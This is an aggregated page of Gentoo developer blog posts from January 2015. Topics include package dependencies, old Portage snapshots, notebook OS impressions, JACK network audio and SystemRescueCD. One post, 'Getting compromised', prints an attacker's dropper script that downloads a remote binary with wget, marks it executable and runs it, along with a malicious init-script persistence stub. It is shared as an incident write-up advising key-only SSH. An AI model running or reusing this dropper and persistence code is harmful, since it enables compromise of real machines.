
Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
January 25, 2015, 16:04 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

January 23, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
A story of Dependencies (January 23, 2015, 03:41 UTC)

Yesterday I wanted to update a build chroot I have. And ... strangely ... there was a pile of new dependencies:

# emerge -upNDv world

These are the packages that would be merged, in order:

Calculating dependencies... done!
[ebuild     U  ] sys-devel/patch-2.7.2 [2.7.1-r3] USE="-static {-test} -xattr" 0 KiB
[ebuild     U  ] sys-devel/automake-wrapper-10 [9] 0 KiB
[ebuild  N     ] dev-libs/lzo-2.08-r1:2  USE="-examples -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/dejavu-2.34  USE="-X -fontforge" 0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-common-1.42.0  0 KiB
[ebuild  N     ] media-libs/libpng-1.6.16:0/16  USE="-apng (-neon) -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/vala-common-0.26.1  0 KiB
[ebuild     U  ] dev-libs/libltdl-2.4.5 [2.4.4] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] virtual/ttf-fonts-1  0 KiB
[ebuild  N     ] x11-themes/hicolor-icon-theme-0.14  0 KiB
[ebuild  N     ] dev-perl/XML-NamespaceSupport-1.110.0-r1  0 KiB
[ebuild  N     ] dev-perl/XML-SAX-Base-1.80.0-r1  0 KiB
[ebuild  N     ] virtual/perl-Storable-2.490.0  0 KiB
[ebuild     U  ] sys-libs/readline-6.3_p8-r2 [6.3_p8-r1] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild     U  ] app-shells/bash-4.3_p33-r1 [4.3_p33] USE="net nls (readline) -afs -bashlogger -examples -mem-scramble -plugins -vanilla" 0 KiB
[ebuild  N     ] media-libs/freetype-2.5.5:2  USE="adobe-cff bzip2 -X -auto-hinter -bindist -debug -doc -fontforge -harfbuzz -infinality -png -static-libs -utils" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-SAX-0.990.0-r1  0 KiB
[ebuild  N     ] dev-libs/libcroco-0.6.8-r1:0.6  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-LibXML-2.1.400-r1  USE="{-test}" 0 KiB
[ebuild  N     ] dev-perl/XML-Simple-2.200.0-r1  0 KiB
[ebuild  N     ] x11-misc/icon-naming-utils-0.8.90  0 KiB
[ebuild  NS    ] sys-devel/automake-1.15:1.15 [1.13.4:1.13, 1.14.1:1.14] 0 KiB
[ebuild     U  ] sys-devel/libtool-2.4.5:2 [2.4.4:2] USE="-vanilla" 0 KiB
[ebuild  N     ] x11-proto/xproto-7.0.26  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xextproto-7.3.0  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/inputproto-2.3.1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/damageproto-1.2.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/xtrans-1.3.5  USE="-doc" 0 KiB
[ebuild  N     ] x11-proto/renderproto-0.11.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/font-util-1.3.0  0 KiB
[ebuild  N     ] x11-misc/util-macros-1.19.0  0 KiB
[ebuild  N     ] x11-proto/compositeproto-0.4.2-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/recordproto-1.14.2-r1  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libICE-1.0.9  USE="ipv6 -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libSM-1.2.2-r1  USE="ipv6 uuid -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/fixesproto-5.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/randrproto-1.4.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/kbproto-1.0.6-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xf86bigfontproto-1.2.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXau-1.0.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdmcp-1.1.1-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/libpthread-stubs-0.3-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pixman-0.32.6  USE="sse2 (-altivec) (-iwmmxt) (-loongson2f) -mmxext (-neon) -ssse3 -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  NS    ] app-text/docbook-xml-dtd-4.4-r2:4.4 [4.1.2-r6:4.1.2, 4.2-r2:4.2, 4.5-r1:4.5] 0 KiB
[ebuild  N     ] app-text/xmlto-0.0.26  USE="-latex" 0 KiB
[ebuild  N     ] sys-apps/dbus-1.8.12  USE="-X -debug -doc (-selinux) -static-libs -systemd {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] net-misc/curl-7.40.0  USE="ipv6 ssl -adns -idn -kerberos -ldap -metalink -rtmp -samba -ssh -static-libs {-test} -threads" ABI_X86="(64) -32 (-x32)" CURL_SSL="openssl -axtls -gnutls -nss -polarssl (-winssl)" 0 KiB
[ebuild  N     ] app-arch/libarchive-3.1.2-r1:0/13  USE="acl bzip2 e2fsprogs iconv lzma zlib -expat -lzo -nettle -static-libs -xattr" 0 KiB
[ebuild  N     ] dev-util/cmake-3.1.0  USE="ncurses -doc -emacs -qt4 (-qt5) {-test}" 0 KiB
[ebuild  N     ] media-gfx/graphite2-1.2.4-r1  USE="-perl {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/fontconfig-2.11.1-r2:1.0  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-admin/eselect-fontconfig-1.1  0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-1.42.0  USE="-cairo -doctool {-test}" PYTHON_TARGETS="python2_7" 0 KiB
[ebuild  N     ] dev-libs/atk-2.14.0  USE="introspection nls {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-util/gdbus-codegen-2.42.1  PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-proto/xcb-proto-1.11  ABI_X86="(64) -32 (-x32)" PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-libs/libxcb-1.11-r1:0/1.11  USE="-doc (-selinux) -static-libs -xkb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libX11-1.6.2  USE="ipv6 -doc -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXext-1.3.3  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXfixes-5.0.1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrender-0.9.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/cairo-1.12.18  USE="X glib svg (-aqua) -debug (-directfb) (-drm) (-gallium) (-gles2) -opengl -openvg (-qt4) -static-libs -valgrind -xcb -xlib-xcb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXi-1.7.4  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gdk-pixbuf-2.30.8:2  USE="X introspection -debug -jpeg -jpeg2k {-test} -tiff" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcursor-1.1.14  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdamage-1.1.4-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrandr-1.4.2  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcomposite-0.4.4-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXtst-1.2.2  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-core-2.14.1:2  USE="X introspection" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-atk-2.14.1:2  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/harfbuzz-0.9.37:0/0.9.18  USE="cairo glib graphite introspection truetype -icu -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pango-1.36.8  USE="introspection -X -debug" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gtk+-2.24.25-r1:2  USE="introspection (-aqua) -cups -debug -examples {-test} -vim-syntax -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/librsvg-2.40.6:2  USE="introspection -tools -vala" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-themes/adwaita-icon-theme-3.14.1  USE="-branding" 0 KiB
[ebuild  N     ] x11-libs/gtk+-3.14.6:3  USE="X introspection (-aqua) -cloudprint -colord -cups -debug -examples {-test} -vim-syntax -wayland -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/dconf-0.22.0  USE="X {-test}" 0 KiB

Total: 78 packages (6 upgrades, 70 new, 2 in new slots), Size of downloads: 0 KiB

The following USE changes are necessary to proceed:
 (see "package.use" in the portage(5) man page for more details)
# required by x11-libs/gtk+-2.24.25-r1
# required by x11-libs/gtk+-3.14.6
# required by gnome-base/dconf-0.22.0[X]
# required by dev-libs/glib-2.42.1
# required by media-libs/harfbuzz-0.9.37[glib]
# required by x11-libs/pango-1.36.8
# required by gnome-base/librsvg-2.40.6
# required by x11-themes/adwaita-icon-theme-3.14.1
=x11-libs/cairo-1.12.18 X
BOOM. That's heavy. There's gtk2, gtk3, most of X ... and things want to enable USE="X" ... what's going on ?!

After some experimenting with selective masking and tracing dependencies I figured out that it's dev-libs/glib that pulls in "everything". Eh?
ChangeLog says:
  21 Jan 2015; Pacho Ramos  -files/glib-2.12.12-fbsd.patch,
  -files/glib-2.36.4-znodelete.patch,
  -files/glib-2.37.x-external-gdbus-codegen.patch,
  -files/glib-2.38.2-configure.patch, -files/glib-2.38.2-sigaction.patch,
  -glib-2.38.2-r1.ebuild, -glib-2.40.0-r1.ebuild, glib-2.42.1.ebuild:
  Ensure dconf is present (#498436, #498474#c6), drop old
So now glib depends on dconf (which is actually not correct, but fixes some bugs for gtk desktop apps). dconf has USE="+X" in the ebuild, so it overrides profile settings, and pulls in the rest.
USE="-X" still pulls in dbus unconditionally, and ... dconf is needed by glib, and glib is needed by pkgconfig, so that would be mildly upsetting as every user would now have dconf and dbus installed. (Unless, of course, we switched pkgconfig to USE="internal-glib")
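
For users hitting this on a non-desktop box before a proper fix lands, one possible local stop-gap (a sketch only, not the solution we settled on below) would be to switch pkgconfig to its bundled glib copy via package.use:

# /etc/portage/package.use - hypothetical local workaround, not the final fix
dev-util/pkgconfig internal-glib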

After a good long discussion on IRC with some good comments on the bugreport we figured out a solution that should work for all:
The dconf ebuild is fixed to not set default USE flags, so only desktop profiles or USE="X" set by users will pull in X-related dependencies. glib gets a dbus USE flag, which is enabled by default on desktop profiles, so there the dependency chain works as desired. And for the no-desktop, no-X use case we have no extra dependencies, and no reason to be grumpy.

This situation shows quite well how unintended side-effects may happen. The situation looked good for everyone on a desktop profile (and dconf is small enough to be tolerated as a dependency). But on non-desktop profiles, suddenly, we're looking at a pile of 'wrong' dependencies, accidentally forced on everyone. Oops :)

In the end, all is well, and I'm still confused why writing a config file needs dbus and xml and stuff. But I guess that's called progress ...

January 21, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Old Gentoo system? Not a problem… (January 21, 2015, 21:05 UTC)

If you have a very old Gentoo system that you want to upgrade, you might have some issues with too old software and Portage which can’t just upgrade to a recent state. Although many methods exist to work around it, one that I have found to be very useful is to have access to old Portage snapshots. It often allows the administrator to upgrade the system in stages (say in 6-months blocks), perhaps not the entire world but at least the system set.

Finding old snapshots might be difficult though, so at one point I decided to create a list of old snapshots, two months apart, together with the GPG signature (so people can verify that the snapshot was not tampered with by me in an attempt to create a Gentoo botnet). I haven’t needed it myself in a while, but I still try to update the list every two months, which I just did with the snapshot of January 20th this year.
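
Verifying a downloaded snapshot against its detached signature is a one-liner; the filename below is only an example, so adjust it to the snapshot you actually grabbed (and make sure the Gentoo release key is in your keyring first):

$ gpg --verify portage-20150120.tar.xz.gpgsig portage-20150120.tar.xz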

I hope it at least helps a few other admins out there.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Demo Operating Systems on new hardware (January 21, 2015, 10:16 UTC)

Recently I got to interact with two Lenovo notebooks - an E445 with Ubuntu Demo preinstalled, and an E431 with Win8 Demo preinstalled.
Why do I say demo? Because these were completely unusable. Let me explain ...

The E445 is a very simple notebook - 14" crap display, slowest AMD APU they could find, 4GB RAM (3 usable due to graphics card stealing the rest). Slowest harddisk ever ;)
The E431 is pretty much the same form factor, but the slowest Intel CPU (random i3) and also 4GB RAM and a crap display.

On powerup the E445 spent about half an hour "initialising" and kinda installing whatever. Weird because you could do that before and deliver an instant-on disk image, but this whole thing hasn't been thought out.
The Ubuntu version it comes with (12.04 LTS I think?) is so old that the graphics drivers can't drive the display at native resolution out of the box. So your display will be a fuzzy 1024x768 upscaled to 1366x768. I consider this a demo because there's some obvious bugs - the black background glows purple, there's random output from init scripts bleeding over the bootsplash. And then once you login there's this ... hmm. Looks like a blend of MovieOS and a touchscreen UI and goes by the name of Unity. The whole mix is pretty much unusable, mostly because basic things like screen resolution are broken in ways that are not easy to fix.

The other device came with a Win8 demo. Out of the box it takes about 5 minutes to start, and then every app takes 30-60 seconds to start. It's brutally slow.
After boot about 2.5GB RAM are in use, so pretty much any action can trigger swapping. It's brutally slow. Oh wait, I already said that.
At some point it decided to update to 8.1, which took half an hour to download and about seven hours to install. WHAT THE EFF!

The UI is ... MovieOS got drunk. A part is a kinda-touchscreen thingy, and the rest is even more confused. Localization is horribad (some parts are pictogram only, some parts are text only) - and since this is a Chinese edition I wouldn't even know how to reboot it! Squiggly hat box squiggly bug ... or is it square squiggly star? Oh my, this is just bad.
And I said demo, because shutdown doesn't. Looks like the hibernate and shutdown bugs are crosswired the wrong way?
There's random slowdowns doing basic tasks, even youtube video randomly stutters and glitches because the OS is still not ready for general use. And it's slow ... oh wait, I said that. So all in all, it's a nice showroom demo, but not useful.

Installing Gentoo was all in all pretty boring; with full KDE running, the memory usage is near 500MB (compared to >2GB for the Win8 demo). Video runs smoothly, audio works. The Ethernet connection with r8169 works; WLAN with the BCM43142 requires broadcom-sta aka wl. A very, very stupid driver - it'd be easier to not have this device built in at all.
Both the intel card in the E431 and the radeon in the E445 work well, although the HD 8550G needs the newest release of xf86-video-ati to work.

The E445 boots cleanly in BIOS mode; the E431 quietly fails (sigh) because of SecureBoot (sigh!) unless you actively disable it. The E431 also randomly tries to reset to factory defaults, or fails to boot with a fan warning. Very shoddy, but usually smacking it with a hammer helps.

I'm a little bit sad that all new notebooks are so conservative with the maximum amount of RAM, but on the upside the minimum is defined by the Win8 demo requirements. So most devices have 4GB RAM, which reminds me of 2008. Hmm.
Harddisks are getting slower and bigger - this seems to be mostly penny pinching. The harddisk in the R400 I had years ago was faster than the new ones!

And vendors should maybe either sell naked notebooks without an OS, or install something that is properly set up and preconfigured. And, maybe, include a proper recovery DVD so that the OS can be reinstalled? Especially as both these notebooks come with a DVD drive. I can't say whether the drive works because I lack media to test with, but it wastes space ...

(If you are a vendor, and want to have things tested or improved, feel free to send me free hardware and maybe consider compensating me for my time - it's not that hard to provide a good user experience, and it'll improve customer retention a lot!)

Getting compromised (January 21, 2015, 09:16 UTC)

Recently I was asked to set up a new machine. It had been minimally installed, network started, and then ignored for a day or two.

As I logged in I noticed a weird file in /root: n8005.tar
And 'file' said it's a shellscript. Hmmm ....

#!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://432.567.99.1/install/8005
chmod +x 8005
./8005


At this point my confidence in the machine had been ... compromised. "init 0" it is!
A reboot from a livecd later I was trying to figure out what the attacker was trying to do:
* An init script in /etc/init.d
#!/bin/sh
# chkconfig: 12345 90 90
# description: epnlmqmjph
### BEGIN INIT INFO
# Provides:             epnlmqmjph
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    epnlmqmjph
### END INIT INFO
case $1 in
start)
        /usr/bin/epnlmqmjph
        ;;
stop)
        ;;
*)
        /usr/bin/epnlmqmjph
        ;;
esac
* A file in /usr/bin
# file epnlmqmjph
epnlmqmjph: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

# md5sum epnlmqmjph
2cb5174e26c6782db94ea336696cfb7f  epnlmqmjph
* a file in /sbin I think - I didn't write down everything, just archived it for later analysis
# file bin_z 
bin_z: ERROR: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linkederror reading (Invalid argument)
# md5sum bin_z 
85c1c4a5ec7ce3efef5c5b20c5ded09c  bin_z
The only action I could do at this stage was wipe and reinstall, and so I did.
So this was quite educational, and a few minutes after reboot I saw a connection with putty as user agent in the ssh logs.
Sorry kid, not today ;)

There's a strong lesson in this: Do not use ssh passwords. Especially for root. A weak password can be accidentally bruteforced in a day or two!

sshd has an awesome feature: "PermitRootLogin without-password". If you rely on root login, at least avoid successful password logins!
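
For reference, a minimal sshd_config sketch along those lines (option names as in OpenSSH of that era; newer releases spell the first one "prohibit-password"):

# /etc/ssh/sshd_config
PermitRootLogin without-password    # root may log in with keys only, never with a password
PasswordAuthentication no           # or go further and disable password logins for everyone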

And I wonder how much accidental security running not-32bit not-CentOS gives ;)

January 19, 2015
Cinnamon 2.4 (January 19, 2015, 11:55 UTC)

A few weeks ago, I upgraded all Cinnamon ebuilds to 2.4 in the tree. However, I could not get Cinnamon (the shell part) to actually work, as in show anything useful on my display. So this is a public service announcement: if you like Cinnamon and want to help with this issue, please visit bug #536374. For some reason, the hacks found in gnome-shell do not seem to work with Cinnamon’s shell.

January 16, 2015
Michał Górny a.k.a. mgorny (homepage, bugs)
Surround sound over network with Windows 8 (January 16, 2015, 15:26 UTC)

I’ve got a notebook with some fancy HD Audio sound card (stereo!), and a single output jack — not a sane way to get surround sound (sure, cool kids use HDMI these days). Even worse, connecting an external amplifier to the jack results in catching a lot of electrical interference. Since I also have a PC which has surround speakers connected, I figured it would be a good idea to stream the audio over the network.

On non-Windows, the streaming would be trivial to set up. Likely PulseAudio on both machines, a few setup bits and done. If you are looking for a guide on how to do such a thing in Windows, you’ll likely end up setting up an Icecast server listening to the stereo mix. Bad twice. Firstly, stereo-only. Secondly, poor latency. Now imagine playing a game or watching a movie with the sound noticeably delayed after the picture (well, in the movie player you could at least play with the A/V delay to work around that). But there must be another way…

The ingredients

In order to get a working surround sound system, you need to have:

  1. two JACK2 servers — one on each computer,
  2. ASIO4ALL,
  3. and an ASIO-friendly virtual sound device such as VB-Audio Hi-Fi Cable.

Install the JACK server on the computer with speakers, and all the tools on the other machine.

Setting up the JACK slave (on speaker-PC)

I’m going to start with setting up the speaker-PC since it’s simpler. It can run basically any operating system, though I’m using Gentoo Linux for this guide. JACK is set up pretty much the same everywhere, with the only difference in used audio driver.

The choice of master vs. slave is pretty much arbitrary. The slave needs to either combine a regular audio driver with netadapter, or the net driver with audioadapter. I’ve used the former.

First, install JACK2. In Gentoo, it can be found in the pro-audio project overlay. A good idea is to disable D-Bus support (USE=-dbus) since I wasn’t able to get JACK running with it and the ebuild doesn’t build regular jackd when D-Bus support is enabled.

Afterwards, start JACK with the desired sound driver and a surround-capable device. You will want to specify a sample rate and bit depth too. Best fit it with the application you’re planning to use. For example:

$ jackd -R -d alsa -P surround40 -r 48000 -S

This starts the JACK daemon with real-time priority support (important for low latency), using ALSA playback device surround40 (4-speaker surround), 48 kHz sample rate and 16-bit samples.

Afterwards, load netadapter with matching number of capture channels, and connect them to the output channels:

$ jack_load netadapter -i '-C 4'
$ jack_connect netadapter:capture_1 system:playback_1
$ jack_connect netadapter:capture_2 system:playback_2
$ jack_connect netadapter:capture_3 system:playback_3
$ jack_connect netadapter:capture_4 system:playback_4

At this point, slave is ready. JACK will wait for a master to start, and will forward any audio received from the master to the local sound card surround output. Since JACK2 supports zero-configuration networking, you don’t need to specify any IP addresses.
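
To avoid retyping all of this after every reboot, the slave setup can go into a small script; here is a sketch assuming the same four-channel configuration as above:

#!/bin/sh
# start-jack-slave.sh - automate the slave setup described above
jackd -R -d alsa -P surround40 -r 48000 -S &
sleep 2                            # give the daemon a moment to come up
jack_load netadapter -i '-C 4'     # four network capture channels
for i in 1 2 3 4; do
    jack_connect netadapter:capture_$i system:playback_$i
done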

Setting up the virtual device

After getting the slave up, it’s time to set up the sound source. After installing all the components, the first goal is to set up the virtual audio device. Once the Hi-Fi Cable package is installed (no need to reboot), the system should start seeing two new devices — a playback device called ‘Hi-Fi Cable Input’ and a recording device called ‘Hi-Fi Cable Output’. Now open the sound control panel applet and:

  1. select ‘Hi-Fi Cable Input’ as the default output device.
  2. Right-click it and configure speakers. Select whatever configuration is appropriate for your real speaker set (e.g. quad speakers).
  3. (Optionally) right-click it and open properties. On the advanced tab select sample rate and bit depth. Afterwards, open properties of the ‘Hi-Fi Cable Output’ recording device and set the same parameters.

Control Panel sound settings with the virtual Hi-Fi Cable Input device
Advanced Hi-Fi Cable Input device properties (sample rate and bit depth setting)

As you may notice, even after setting the input to multiple speakers, the output will still be stereo. That’s a bug (limitation?) we’re going to work-around soon…

Setting up the JACK master

Now that the device is ready, we need to start setting up JACK. On Windows, the ‘Jack Control’ GUI is probably the easiest way. Start with ‘Setup’. Ensure that the ‘portaudio’ driver is selected, and choose ‘ASIO::ASIO4ALL v2’ as both the input and output device. The right-arrow button to the right of the text inputs should provide a list of devices to select. Additionally, select the sample rate matching the one set for the virtual device and the JACK slave.

JACK setup window

Now, we need to load the netmanager module. Similarly to the slave setup, this is done using jack_load. To get this fully automated, you can use the ‘Execute script after startup’ option from the ‘Options’ (right-arrow button is not helpful this time). Create a new .bat file somewhere, and put the following command inside:

jack_load netmanager

Save the file and select it as the post-startup script. Now the module will be automatically loaded every time you start JACK via Jack Control. You may also fine-tune some of the ‘Misc’ settings to fit your preferences. Then confirm with ‘Ok’ and click ‘Start’. If everything went well so far, after clicking ‘Connect’ you should see both ‘System’ and the slave’s hostname (assuming it is up and running). Do not connect anything yet, just verify that JACK sees the slave.

Connecting the virtual sound card to JACK

Now that the JACK is ready, it’s time to connect the virtual sound card to the remote host. The traditional way of doing that would be through connecting the local recording device (stereo mix or Virtual Cable Output) to the respective remote pins. However, that would mean just stereo. Instead, we have to cheat a little.

One of the fancy features of VB-Audio’s Virtual Hi-Fi Cable is that it supports using ASIO-compatible sound processors. In other words, the sound from virtual cable input is directed into ASIO output port for processing. Good news is that the stereo stripping occurs directly in virtual cable output, so ASIO still gets all the channels. All we have to do is to capture sound there…

Find VB-Cable’s ‘ASIO Bridge’ and start it. If the button in the middle states ‘ASIO OFF’, switch it to enable ASIO. Then click on the ‘Select A.S.I.O. Device’ text below it and select ‘JackRouter’. If everything went well, ‘VBCABLE_AsioBridge’ should appear in the JACK connection panel.

ASIO Bridge window

The final touches

Now that everything’s in place, it’s just a matter of connecting the right pins. To avoid having to connect them manually every time, use the ‘Patchbay’ panel. First, use ‘Add’ on left-hand side to add an output socket, select ‘VBCABLE_AsioBridge’ client and keep clicking ‘Add plug’ for all the input channels. Then, ‘Add’ on right-hand side, your remote host as client and add all the output channels. Now select both new sockets and ‘Connect’.

JACK patchbay setup

Save your new patchbay definition somewhere, and ‘Activate’ it. If you did well, the connections window should now show connections between respective local and remote pins and you should be able to hear sound from the remote speakers.

JACK connections window after setup

Now you can open ‘Setup’ again, and on the ‘Options’ tab activate patchbay persistence. Select your newly created patchbay definition file and from now on, starting JACK should enable the patchbay, and the patchbay should ensure that the pins are connected every time they reappear.

Maintenance notes

First of all, you usually don’t need to set an explicit connection between your virtual device and the real system audio device. On my system that connection is established automatically, so that the sound reaches both the remote host and the local speakers. If that’s not what you want, just mute the local sound card…

Secondly, note that now the virtual sound card is the default device, so applications will control its volume (both for remote and local speakers). If you want to mute the local speakers, you need to open the mixer and select your local sound card from device drop-down.

Thirdly, VBCABLE_AsioBridge likes to disappear occasionally when restarting JACK. If you don’t see it in the connections, just turn it off and on again (the ‘ASIO ON’ button) and it should reappear.

Fourthly, if you hear skipping, you can try playing with ‘Frames/Period’ in JACK’s setup. Or reduce the sample rate.

January 14, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Cool Gentoo-derived projects (I): SystemRescueCD (January 14, 2015, 22:53 UTC)

Gentoo Linux is the foundation for quite a few very cool and useful projects. So, I'm starting (hopefully) a series of blog posts here... and the first candidate is a personal favourite of mine, the famous SystemRescueCD.

http://www.sysresccd.org/
Ever needed a powerful Linux boot CD with all possible tools available to fix your system? You switched hardware and now your kernel hangs on boot? You want to shrink your Microsoft Windows installation to the absolute minimum to have more space for your penguin picture collection? Your Microsoft Windows stopped booting but you still need to get your half-finished PhD thesis off the hard drive? Or maybe you just want to install the latest and greatest Gentoo Linux on your new machine?

For all these cases, SystemRescueCD is the Swiss army knife of your choice. With lots of hardware support, filesystem support, software, and boot options ranging from CD and DVD to installation on USB stick and booting from a floppy disc (!), just about everything is covered. In addition, SystemRescueCD comes with a lot of documentation in several languages.

The page on how to create customized versions of SystemRescueCD gives a few glimpses on how Gentoo is used here. (I'm also playing with a running version in a virtual machine while I type this. :) Basically the internal filesystem is a normal Gentoo x86 (i.e. 32bit userland) installation, with distfiles, portage tree, and some development files (headers etc.) removed to decrease disk space usage. (Skimming over the files in /etc/portage, the only really unusual thing which I can see is that >=gcc-4.5 is masked; the installed GCC version is 4.4.7- but who cares in this particular case.) After uncompressing the filesystem and re-adding the Gentoo portage tree, it can be used as a chroot, and (with some re-emerging of dependencies because of the deleted header files) packages can be added, deleted, or modified.

Downsides? Well, not much. Even if you select a 64bit Kernel on boot, the userland will always be 32bit. Which is fine for maximum flexibility and running on ancient hardware, but of course imposes the usual limits. And rsync then runs out of memory after copying a few TByte of data (hi Patrick)... :D

